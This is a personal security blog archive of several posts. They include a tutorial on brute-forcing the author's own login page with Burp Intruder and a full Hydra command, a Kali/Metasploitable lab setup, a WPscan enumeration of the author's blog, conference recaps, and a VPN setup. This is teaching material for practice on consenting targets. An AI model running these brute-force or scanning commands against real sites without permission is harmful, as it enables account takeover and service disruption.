Online Brute Forcing 101

A close friend once mentioned how cool it’d be to practice brute forcing for a website login. I created a simple web page with a login form. Incorrect logins display a red error message while successful logins show the rest of the web page. There’s no database or complex code behind the webpage. It simply hashes the user input and compares it to a stored value.

Before we continue, I must make it blatantly obvious that hacking any online service without consent could land you in a lot of trouble. For your safety, do not hack any systems outside of your personal domain or online labs / tutorials that give consent. If you’re reading this blog post. You have my consent to brute force greenjam94.me/login.php and to save time and limit web traffic from brute forcing attempts, a username and wordlist is provided.

There is a couple tools that will help with brute forcing an online form. Two tools that I will demonstrate in this post is Burp suite’s intruder module and Hydra. Both tools are available on Kali linux.

Burp Suite

Burp suite is a proxy from Portswigger. My websites all use HTTPS and do not allow unencrypted traffic, you’ll have to install and trust the Portswigger certificate that is generated by the proxy.

Look closely at the image above.  On the left hand side you can see all the files being called. There are links to this blog, some Javascript code from a CDN, and bootstrap code from another CDN. These can all be ignored. What we care about are the files from greenjam94.me in particular. The login form and the passwords text file are caught by the proxy. Every POST attempt to login will be recorded. The image above shows one attempt.

Right click a POST request and click “Send to Intruder” or highlight it and press CTRL+I. This will take you to the Intruder module. Go to the positions tab. We do not want to change the user value, so remove that. The page should look like the following.

Next go to the payloads tab. Either paste the values in from the passwords text file or upload the entire file if you saved a local copy. There should be 23 requests.

Click the “start attack” button in the upper right corner. The attempts should go by quickly, even if using the free version of Burp suite. The error messages are not returned as HTTP codes, every response is 200 (OK). Our saving grace is that the successful login shows more content, so the size is larger. Maybe the columns of those results are orderable?

Hydra

Hydra is a command line tool that can make quick work of many kinds of brute force attempts. However the syntax can be a little confusing. Below is the command to use in order to bruteforce this form. You’ll also have to save the passwords file locally before trying this.

hydra -l ‘iAm’ -P wordlist.txt www.greenjam94.me https-post-form -I “/login.php:name=^USER^&pswd=^PASS^:Incorrect password”

I will break down the options used above.

  • -l username value, (a lowercase L)
  • -P password file, uppercase options are used for files with multiple values to attempt
  • www.greenjam94.me domain, the next requirement is the domain to attack
  • https-post-form form type, this is the kind of form you’re targeting a full list is provided in the man pages (manual)
  • -I a option to prevent trying to load restore files on multiple attempts to run hydra
  • “1:2:3” form parameters separated by a colon,
    • 1 is the file after the domain which always starts with a “/”
    • 2 is the input names and values. ^USER^ and ^PASS^ must be used
    • 3 is an expected error message, it doesn’t have to be the complete message. (Don’t use colons unless escaped)

Running this command you should see something like the following.

Feel free to try each method out once on your own on my login page! Please don’t do it repeatedly though, this is basically asking everyone to DOS me and I want to keep my websites up without pissing off my hosting company.

After finding the correct password, I suggest typing in the password manually and visiting the successful web page. Headphone alert, don’t use them. Speakers at high volume before submitting the form work best.

Know of any other good tools for online brute forcing? Let me know in a comment or on twitter. I hope you found this post to be helpful.

Volunteering at GrrCON 2017

GrrCON 2017, the seventh year and my third time attending. I volunteered again this year because it is a lot more involved than being a regular attendee. I’ve been to other conferences where volunteering burns you out. GrrCON is the only con where I could be in the middle of one job and ask “What more can I do to help?”.

The 2017 Difference

GrrCON hasn’t changed much since I have started coming to it. There are great speakers, supportive vendors, free beer, and even a tattoo artist. The organizers and volunteer staff do a great job putting on such a quality conference every year. If you haven’t been before, I strongly recommend going next year.

One big difference this year was the overwhelming amount of registrations. Apparently there were so many vendors and attendees signing up, registration had to be capped before we exceeded the amount of swag that was preordered. Attendees that got in later in the day had to use badges from previous years because we ran out.

Vendors were also placed in the hall outside of the tracks for speakers because the vendors area wasn’t big enough. While it was cool to see charities, local community groups, and school programs in a high traffic area, it still separated them from the vendors area.

All of the talks were recorded by IronGeek. He does a great job recording everyone that wants to be recorded and gets the videos posted online quickly. You need to go and checkout the list of videos from this conference, each of the speakers have good talks. The number of talks that I want to see are already in the dozens.

My Experience

Wednesday

Volunteers arrived a day early to get everything set up and swag bags ready for registration. It was a long day of preparing badges and unloading boxes but it flew by. There was a ton of people to help and it was great to catch up and see what people have been doing since last year. I forgot how fun it was to mess with Jen and the rest of the GrrCON family.

Wednesday night was the speaker dinner. People were always moving around to say hi or get another drink. I saw a lot of old friends that I haven’t seen in a while. It’s been said for a while that GrrCON is more of a family reunion than a security conference and this dinner made me truly believe that. I also picked up a set of Hak4Kidz badges that night. It’s a great group and I wanted to show my support.

One cool story I’ll share is that I was sitting with the guys from the IoT hacking village. They told me about the bluetooth badges, a pi zero that did half of a handshake with nearby devices. The badge tracked the overall number of bluetooth devices it could interact with. After a certain number of devices were identified, it also started playing with wifi networks. I wasn’t told more because it was a challenge for the village, but I was really interested in the project.

Thursday

Thursday morning started at 6 am. I was one of the first volunteers to show up and help set up registration. We carried all the swag bags to the front table and added a few gifts to some of the bags. My jobs for the rest of the day were to float around the vendor area in the morning and to help with the mi-go track in the afternoon.

Thursday night we partied at Z’s, I met up with some of #misec‘s finest and had a great time. The bar was doing karaoke and Lintile sang a tribute to #TrevorForget. After Z’s we got a drink at Founders before crashing for another early morning the next day.

Friday

Friday’s job was to help with the large speaker track and then play bouncer for the VIP area. While working the VIP area, I was able to have another volunteer tag in so I could go watch a friend give her first talk.

The day went by even faster than Thursday and it seemed like we were tearing down parts of the conference before the talks were even finished. After the con, I had a quick dinner with a few friends, said my goodbyes and left for home.

What is Next?

Next year’s GrrCON will be September 6 & 7! CFP and tickets will open in March. I believe that GrrCON ’18 will be in a larger part of DeVos place in order to accommodate the spike in attendance.

Hopefully I’ll get a speaker badge as well as a volunteer badge next year. It’s just an idea right now. I don’t want to give away too many spoilers, but we’ll find out in March!

The bluetooth badge also gave me an idea, however I have no clue where to start with it. I think it would be cool to get a scrolling LED strip on a hat to display messages like “Hello <bluetooth_device/wifi SSID/etc>!”. I’ll have to reach out to friends and see if that’s an easy project and if it’s actually do-able. Do you think it would be cool to walk around the conference with this?

Installing Kali and Metasploitable on VirtualBox

Have you ever wanted to be a 1337 hacker like you see in the movies? Metasploit automates some of the harder tasks related to penetration testing. This blog post is quick setup to install two virtual machines that will allow you to explore how to use Metasploit.

Step 1: Get files needed to create the VMs

Step 2: Setup Kali

Open VirtualBox, click File > Import Appliance. Choose the kali.ova file that you downloaded from the link above. Click continue to review the VM settings. Hit import, none of the settings should require changing. The import will take a few minutes to complete depending on your machine.

If the VM fails to start after import, read the details of the failure. If it’s related to USB emulation then change the settings. Open the VM settings by right clicking the VM. Click settings. Find the ports tab and click USB. Change the emulation from 2.0 to 1.1 and everything will be good to go.

The default credentials are u: root / p: toor to log in. To use Metasploit for the first time there’s some setup required. Using terminal, start a postgres database by running service postgressql start. Initalize the database by running msfdb init. Check Metasploit by running msfconsole.

Step 3: Setup Metasploitable2

We will need to create a linux machine and use the virtual hard drive from the .zip folder that was downloaded earlier. First step is to unzip the folder and find the Metasploitable.vmdk file.

Next go to VirtualBox and create a new 64bit ubuntu machine. Name it whatever you’ll remember. I used Metasploitable2. Click continue once everything looks correct.

Change the memory size to at least 512mb and click next. There select “Use existing hard drive” and select the .vmdk file we found earlier. Last step is to click create.

Start the box and confirm everything is working as expected. The default credentials are msfadmin/msfadmin. Type ifconfig to see what the boxes IP address is. This will come in handy when trying to scan for the machine from Kali. My machine is at 10.0.2.15.

Step 4: Double check networking

Metasploitable is one of those VMs that are intentionally vulnerable for you to attack. To ensure that no one else attacks your box, make sure it can’t access the internet by confirming in VirtualBox that the network type is set to NAT.

Host-Only would work if we weren’t using another VM to use Metasploit. This is still an option if you want to install Metasploit on your base host and skip the Kali install.

Step 5: Attack

Now play around with Metasploit! Get on Kali, ping the Metasploitable2 machine to make sure it’s in reach. Run msfconsole for a CLI interface or open armitage for a GUI. A lot of walkthroughs are online that can be a good place to start playing with Metasploit.

More info

For more information on how to use Metasploit, check out Offensive Security’s free course. Look for some articles such as the series from null-byte. Read a book about it, buy now from No Starch Press. My motive for posting this is a lightning talk I gave at #misec this month. The IntroToMSF slides are hosted here for those who are interested.

PHP Regex tutorial

Have you ever wondered how web applications do validation on forms? How does the app know when your input is really an email address? In most PHP applications, this is done using regular expressions (Regex).

I’ve previously posted about how to defend against XSS and SQL injection. Checking strings with a white list of allowed characters is one of the easiest changes a developer can make. Regex makes this easy in most programming languages.

In that post I linked to RegexOne. The site had a pretty good cheatsheet covering how regex is useful. This is only really helpful if you are familiar with how regex works.

If you’re looking for a more complete tutorial, try his. Guru99 has reached out to me to promote their new tutorial: PHP Regular Expressions Tutorial: Preg_match, Preg_split, Preg_replace. It looks like a pretty comprehensive tutorial. I suggest looking at that to learn some of the basics behind regex.

Do not waste your time with HPKP

This is my last post related to HTTP Public Key Pinning (HPKP). This is a post in response to Scott Helme’s latest post about him giving up on HPKP and how my blog is a perfect example of his concerns.

In the past I’ve written three articles about the HPKP header:

The point of each of these articles are pretty well summed up in their titles. For work, I was tasked with learning about HPKP and of course I made blog posts as I tired out the new header.

Starting with HPKP

While learning about HPKP, Helme’s posts were a great resource for me. Thanks to him, I was able to understand the process well enough to get some tests up online using this domain.

Everything worked fine until I had to renew my LetsEncrypt SSL certificate. Renewing caused the public key pin to not match the certificate and blocked all users who visited my blog with a browser that supported HPKP.

Running into issues

In Helme’s post, my issue is part of the “bad hygiene” that is warned against. HPKP requires that the best practices are used to key certificates up to date as well as the pins. Using LetsEncrypt certbot to auto-renew my domain’s certificate is not the best way to do this, since I can’t keep track of the pins, I was unable to properly support the header.

In order to “resolve” the issue, I had to strip the header from my site and ask all concerned clients to forget my domain from their browser’s saved history that remembered my old pin.

Conclusion

It is at this point that I agree with Helme’s conclusion that “One of the biggest concerns I have with HPKP right now is sites trying to use it and getting it wrong”. Especially that my blog is one of the sites that proves how easy it is to get wrong! It’s because of this difficulty and the massive impact a bad certificate/pin combination has on end users that I agree HPKP is not worth implementing.

Please go and read Helme’s post if HPKP is something you deal with or if you’re starting to look into it as well!

TV B GONE

Ever sit at a bar with friends and try to have a conversation but the TVs behind the bar were too loud? If only there was a quick convenient way to turn them all off at once. This is where the TV B GONE remote comes in. A simple kit that sends over 100 “power off” signals to TVs within a 150 foot range at the push of a button.

The noisy bar situation has happened to me many times at security conferences. At the very least, the conversation that follows would be quite interesting. The kit requires some soldering, but the instructions from Adafruit are very clear and easy to read.

TV B GONE looks cool by itself. The exposed circuit board has a certain appeal. In order to give it some protection and provide a better grip, there’s a case that can be 3d printed. The design is hosted on Thingiverse. If you’re looking to do the same, don’t cut the wires to the battery holder when building the kit, the remote case is thinner and puts the holder next to the board instead of back to back.

Printing the case

The case printed very well. The designs put the pieces so that the there’s only a small surface area touching the build plate. In order to get a clean print, I had to rotate some of the designs 90 degrees. There were 4 parts included. Total print time was still under 4 hours. After printing, I sanded and painted the case. If I were to do it again, I’d spend more time sanding and try to be more aware of any “low spots”. The paint didn’t cover some small blemishes as well as I expected.

After 3D printing the case, I followed the instructions linked above to solder the kit together. While soldering, I was too focused to take pictures of the process. The final assembly was also pretty easy. I used super glue to stick the battery holder to the front of the case and attach the back of the case.

Usage

So far I’ve been able to turn off every TV in my house. I’ve even been able to turn off multiple TVs when they’re in range. I look forward to bringing it to future security conferences and using it as a talking point.

I recommend anyone who wants a soldering project to attempt this build. It didn’t take long and the only required tools are AA batteries, a soldering iron, and wire clippers.

Breaking My Blog with WPscan

One of the tools offered by default in Kali and many other hacking related distros is WPscan, a black box WordPress vulnerability scanner. I wanted to learn how to use this tool because it would help with recon on CTF challenges, practice boxes from vulnhub, and even trying to keep my own blog vulnerability free.

Disclaimer

Before I tell you more about the tool and how it can be used, I have to throw out the usual disclaimer. Do not use this tool on any WordPress site you don’t own or have permission to scan. I ran WPscan on my own blog and brought the whole site to it’s knees. If you did that to a professional blog or your company’s blog then you could have major problems when you get caught.

Setup

If you don’t have a personal WordPress instance to test, then look at getting OWASP’s Broken Web App installed. It has a vulnerable instance of WordPress included that you can scan against and even try to harden. When things break, just reinstall the VM and start over from scratch.

I have a Kali VM installed on most of my computers. By opening a terminal and typing wpscan -h you can learn about all of the options and possibilities for how to scan a WordPress instance. If you want to avoid all the “bells and whistles” then just run wpscan –url <target> –enumerate p to scan and try to find vulnerable plugins.

The scan and the results

WPscan scans the site looking for version numbers and other exposed information that can be compared to a database of vulnerabilities. While running the scan against my site, there was one vulnerability found. There was also a small issue because the WordPress version was public. I was able to research the vulnerability using the links provided from the scan output. While the “fix” isn’t a perfect patch, it’s better than ignoring the vulnerability until the next update is ready. The version was easy enough to hide by deleting the stock readme.html file.

The issue wasn’t removed on the next scan. The scanner is a quick tool to find some vulnerabilities based on version numbers and other information from the site. There’s no proof of concepts or attempts to validate if a vulnerability is a false positive.

Unexpected fun with WPScan

While running the scanner the –enumerate p option will brute force the website with requests to gather information about plugins. This crippled my site when over 20 simultaneous database connections made the site unresponsive. This wasn’t solely due to the scanner, but to the fact that I created this blog in college. Which means I took the cheap and easy route. Digital Ocean’s one click solution on the smallest VM made that possible.

The reason I’m not afraid to tell all you hackers about this is because I was able to resolve the issue with some help from friends at #misec. They told me about adding a swapfile that could help boost some power to my little VM. Since then I’ve been able to run WPscan multiple times without a single fatal performance issue.

Edit: A swapfile is NOT recommended for preventing DoS resulting from scans or a spike in traffic. This is a quick fix and a cheap band aid. If your company uses WordPress or you have a personal blog thats getting a lot of traffic, upgrade the VM or migrate to a better server that can handle the requirements. This was pointed out to me when I first heard of using a swapfile and again on Twitter after posting this.

Twitter reply

Converge 2017

May 11-12th was the Converge conference. If you’re in Michigan and are curious about information security, then I suggest you look at attending next year. For those that missed this year, Irongeek recorded all the talks and posted them online for you! Watch some of the talks and then put an alert on your phone to buy tickets for next year.

Converge is a great conference. I’ll admit I’m partial because it’s in my backyard. However that isn’t the only reason I like it. The talks cover great content, the speakers are friendly, and it’s not so big that guests feel like they’re lost in a see of other attendees.

Volunteering

On Thursday, I spent the morning volunteering with Irongeek recording talks for track 2. Helping with A/V is great because I get to volunteer and watch talks with a front row seat. In the afternoon I networked with people in the halls, after all that’s the most important part of a conference, right?

Friday was a lot of fun. I started off by playing with a new toy. A nexus phone loaded with Kali NetHunter. I’m still exploring the tools on it but one of them is called the Mana wireless toolkit that allows me to broadcast a wireless network. This makes for excellent trolling, especially for those who get the inside joke.. There was some evidence at GrrCON a few years ago.

I know at least one person noticed because they had a screenshot for me to share!

Learning how to pen test

The rest of the day, I was in training for web application pen testing. Kevin Johnson from SecureIdeas offered a 1 day version of his week long training course. We went over a lot of great topics, like his recommended methodology and the tools that pen testers can use.

While the training was amazing, it’s still something that Kevin offers others, so I don’t want to spill too many secrets. I do suggest that if you’re interested that you take a look at his site, secretideas.com.

I’ve said it before on these blog posts and I’ll say it again. Conferences are a great center for networking, learning, and growing if you’re looking at getting into the information security industry. Hopefully my stories from this year’s Converge has convinced you to attend the next conference in your area!

Building a community

At the #misec meeting I attended in mid April there was a panel on building a infosec community… so I’m borrowing their title for a post and giving my two cents in order to spread the topic!

I won’t give a huge synopsis of who said what like I did in my last post about a #misec panel. Instead, please watch #misec’s video on youtube if you’re interested in what was shared.

Community?

There were two general categories of discussion at the panel; meetups like #misec or BurbSec, and conferences like Converge or Thotcon. Your community is probably a collection of both. For instance, #misec was born from Bsides Detroit members who wanted more and created monthly meetings to have a smaller (more frequent) version of a Bsides conference. Two aspects are required to start or build a community; networking and attendance.

In order to have a community, people need to attend and contribute. In order for people to know where to show up, there needs to be some kind of networking and outreach. “Grabbing people” is a good way to start a meetup. Find people at a conference, ask around, and tweet to see what the interest is. Welcome everyone and follow up with people and the rest will fall into place. A conference works in the same way as there is a dependency on people. Volunteering, speaking, and attending is the core of networking.

Why me?

Meeting people and networking is a two way street. You get chances to volunteer at conferences, speak out about your interests and get feedback from others in the industry, and there are usually job offers and professional networking involved as well. Even if you’re an introvert and it’s stressful, making a name for yourself and showing people what you’re made of is huge in this industry and there’s a lot of great connections to be made through these communities.

Be involved. It keeps you busy. There are many ways to grow, whether through volunteering at a conference or stumbling through your first talk at a meeting. Being able to inspire others and help them grow is also an awesome part of being in a infosec community. A community is nothing without people, and you are one of those people.

Summary

To keep it short and sweet, try to use the following checklist:

  1. Go to conferences
    • Volunteer if it’s too expensive
    • Volunteer if it’s local and you want to contribute
    • Respond to the CFP or call for papers if you have something fun to share
  2. Join twitter and ask for help
  3. Find the closest city meeting and go
    • Start your own if the closest isn’t close enough
  4. Wash, rinse, and repeat

My experience setting up an Algo VPN

First off, I don’t know if you’ve been avoiding the political storm as much as I have but there’s one thing that’s been so retweeted, shared, and updated that I couldn’t avoid it. The discussion about the privacy of our internet content.

The Problem

ISPs are able to sell your data. While it is possible that similar data is already being collected and used by social media, applications, and other providers… It’s brought up an interesting conversation about how to secure ourselves while browsing the internet.

Using TLS to encrypting the communication between a client and server is a good way to secure the content between you and a website. However what about your destination, ip address, and other information that’s required to connect to that server? Virtual private networks (VPNs) have been used by corporations and security focused individuals for years. Lately VPNs are the center of attention because they offer a way to encrypt information about your host and prevent your real location from being collected. To learn more about what a VPN is, check out https://www.bestvpn.com/blog/38176/vpns-beginners-need-know/.

A Solution

I’ve been toying with the idea of using a VPN for a while now. Going to security conventions and using the hotel’s public wifi has never let me sleep well at night. A VPN would minimize that issue. I’ve considered a few paid services but ultimately decided to go for the “create your own for cheap” route.  The infosec community has been buzzing about Algo. Algo VPN “is a set of Ansible scripts that simplify the setup of a personal IPSEC VPN. It uses the most secure defaults available, works with common cloud providers, and does not require client software on most devices. See our release announcement for more information.”

This blog is hosted on a DigitalOcean droplet. I’m familiar with how droplets work and when I heard that Algo can create a droplet and use it as a VPN provider, I jumped at the opportunity.

How I setup my Algo VPN

Following the README.md of the Algo github repo is very straightforward. The idea is to clone the repo to your local computer. After installing the dependencies and setting up the config file for the number of users to expect, Algo takes care of all the heavy lifting by using DigitalOcean’s APIs to create the droplet and setup the VPN.

I cloned the repo onto my mac, installed the python dependencies and only had one hiccup. On a mac, you need to have Xcode installed and agree to the license. All of the files required to setup the VPN clients are saved to the config folder after running the script. To connect my mac, all I had to do was double click the <username>.mobileconfig file and everything was fully setup.

I’ll have to update this post as I setup my other devices. Windows computers and Android phones are on my to do list.

To test if the VPN is working, visit whoer.net. Check to see if the host connecting to the site is the droplet IP or your computer’s IP. The caveat of using such a VPN is that it’s not fully anonymous. Website hosts can know your connection is coming from a DigitalOcean droplet because who owns the IP range is publicly available. Similar to the risk of someone watching a Tor node, well known VPN providers can also be monitored. It is only a matter of time before the usage of that droplet is mapped out.

That’s not all folks

VPNs are only one part of a secure digital life. Using HTTPS when connecting to websites, resetting passwords every few months, and enabling two factor authentication is also important. As far as “providers selling our data”… The best way to prevent that is to choose providers with a stronger commitment to their users than those who care more about improving their profits.